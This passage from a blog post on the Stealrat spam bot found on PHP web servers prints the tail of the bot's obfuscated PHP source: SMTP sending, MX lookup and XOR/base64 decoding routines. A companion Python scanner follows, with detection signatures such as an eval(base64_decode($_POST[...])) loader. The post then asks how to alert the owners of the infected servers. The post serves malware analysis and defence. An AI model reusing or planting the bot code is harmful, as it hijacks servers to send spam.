        @fputs($v66b18866, "RCPT TO:<$v01b6e203>\r\n");
        $ve98d2f00 = n54070395($v66b18866);
        if (substr($ve98d2f00, 0, 3) != 250 && substr($ve98d2f00, 0, 3) != 251) return "4+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00);
        @fputs($v66b18866, "DATA\r\n");
        $ve98d2f00 = n54070395($v66b18866);
        if (substr($ve98d2f00, 0, 3) != 354 ) return "5+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00);
        @fputs($v66b18866, $v841a2d68."\r\n.\r\n");
        $ve98d2f00 = n54070395($v66b18866);
        if (substr($ve98d2f00, 0, 3) != 250 ) return "6+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00);
        @fputs($v66b18866, "QUIT\r\n");
        @fclose($v66b18866);
        return 0;
    }
}

function n54070395($v66b18866) {
    $v8d777f38 = '';
    while($v341be97d = @fgets($v66b18866, 4096)) {
        $v8d777f38 .= $v341be97d;
        if(substr($v341be97d, 3, 1) == ' ') break;
    }
    return $v8d777f38;
}

function n9c812bad($vad5f82e8) {
    global $v619d75f8;
    if (!in_array('getmxrr', $v619d75f8) && function_exists("getmxrr")) {
        @getmxrr($vad5f82e8, $v744fa43b, $v6c5ea816);
        if (count($v744fa43b) === 0) return '127.0.0.1';
        $v865c0c0b = array_keys($v6c5ea816, min($v6c5ea816));
        return $v744fa43b[$v865c0c0b[0]];
    } else {
        return '127.0.0.1';
    }
}

function n9a2d8ce3($v1cb251ec) {
    $v1cb251ec = base64_decode($v1cb251ec);
    $vc68271a6 = '';
    for($v865c0c0b = 0; $v865c0c0b < strlen($v1cb251ec); $v865c0c0b++)
        $vc68271a6 .= chr(ord($v1cb251ec[$v865c0c0b]) ^ 2);
    return $vc68271a6;
}
?>
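A defender's companion to the script above, added here as an example and not part of the original post: it scans PHP files for literal fragments of the bot and decodes a captured POST body (for instance from a WAF or audit log) the way the script reads it. The signature names, the `ROLES` labels and all sample values are constructed for illustration.

```python
import base64
import re
import sys
from pathlib import Path
from urllib.parse import unquote_plus


def _sig(literal: bytes):
    """Compile a literal PHP fragment, allowing whitespace between its tokens."""
    tokens = re.findall(rb"[\w$]+|\S", literal)
    return re.compile(rb"\s*".join(re.escape(t) for t in tokens), re.I)


# Fragments copied from the script above; the names on the left are this example's.
SIGNATURES = {
    "eval_post_loader": _sig(b"eval(base64_decode($_POST["),
    "die_marker": _sig(b"chr(43).md5(0987654321)"),
    "ok_marker": _sig(b"chr(79).chr(75).md5(1234567890)"),
    "split_mail_name": _sig(b"'ma'.chr(105).'l'"),
}

# The script picks its inputs by the first letter of each POST key.
ROLES = {"l": "recipients", "d": "template", "m": "mail_host"}


def scan_php(data: bytes) -> list:
    """Return the sorted names of the signatures found in one file's bytes."""
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(data))


def decode_field(value: str) -> str:
    """Undo n9a2d8ce3() (base64, then XOR 2) and the urldecode() that follows."""
    raw = base64.b64decode(value)
    return unquote_plus(bytes(b ^ 2 for b in raw).decode("latin-1"))


def triage_post(fields: dict) -> dict:
    """Label the fields of one captured POST body the way the script reads them."""
    if len(fields) < 2:  # the script answers these with its die() marker
        return {"probe": True}
    encoded = any(key.startswith("e") for key in fields)  # an 'e...' key means XOR+base64
    report = {"probe": False, "encoded": encoded}
    for key, value in fields.items():
        role = ROLES.get(key[:1])
        if role:
            report[role] = decode_field(value) if encoded else unquote_plus(value)
    if "recipients" in report:  # addresses are separated by '#'
        report["recipients"] = report["recipients"].split("#")
    return report


# Constructed samples, not captured data.
SAMPLE_INFECTED = (b"<?php eval ( base64_decode($_POST['k']) ); ?>\n"
                   b"<?php die(PHP_OS.chr(49).chr(48).chr(43).md5(0987654321)); ?>")
SAMPLE_CLEAN = b"<?php echo base64_decode($row['avatar']); mail($to, $s, $b); ?>"
SAMPLE_POST = {"l7": "Y0JgYCx2Z3F2", "d2": "PlFXQEg8ams+LVFXQEg8", "e": "1"}

if __name__ == "__main__":
    # Usage: pass one or more webroot directories to audit as arguments.
    for root in sys.argv[1:]:
        for path in Path(root).rglob("*.php"):
            hits = scan_php(path.read_bytes())
            if hits:
                print(f"{path}: {', '.join(hits)}")
    print(triage_post(SAMPLE_POST))
```

A hit on any single signature is a reason to inspect the file by hand; the backdoors and webshells found alongside the bot are not covered by these patterns.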


Look through the list of IP addresses; your server's IP may be in it. If so, try to isolate the problem yourself. If you are on ordinary shared hosting, write to your hoster that your neighbors have an infection called Stealrat. We do not know what to do next: the problem is localized and all the holes are closed, but the requests keep coming. The list of unique IPs keeps growing. There is no load on the server, but just knowing that this is going on, and at such a scale ... Does anyone know where to write and how to warn the owners of all these IPs? Maybe one of you can tell us.

We wrote to Trend Micro asking what to do with this list of IP addresses. Perhaps they will advise us, perhaps not. Perhaps there is some kind of service to which infected IPs can be submitted, or something similar.

Thank you for your attention, good luck, take care of your servers.

Update 1. A selection of all infected sites from the logs (taken from the bodies of the spam messages)
The table gives the domain and the server IP. The list is unique by domain.
List (4705)

Update 2. An additional selection of domains (hostname)
The table gives the domain and the server IP. The list is unique by domain.
Many thanks to xaker1 for the list provided.
List (1223)

Source: https://habr.com/ru/post/221871/

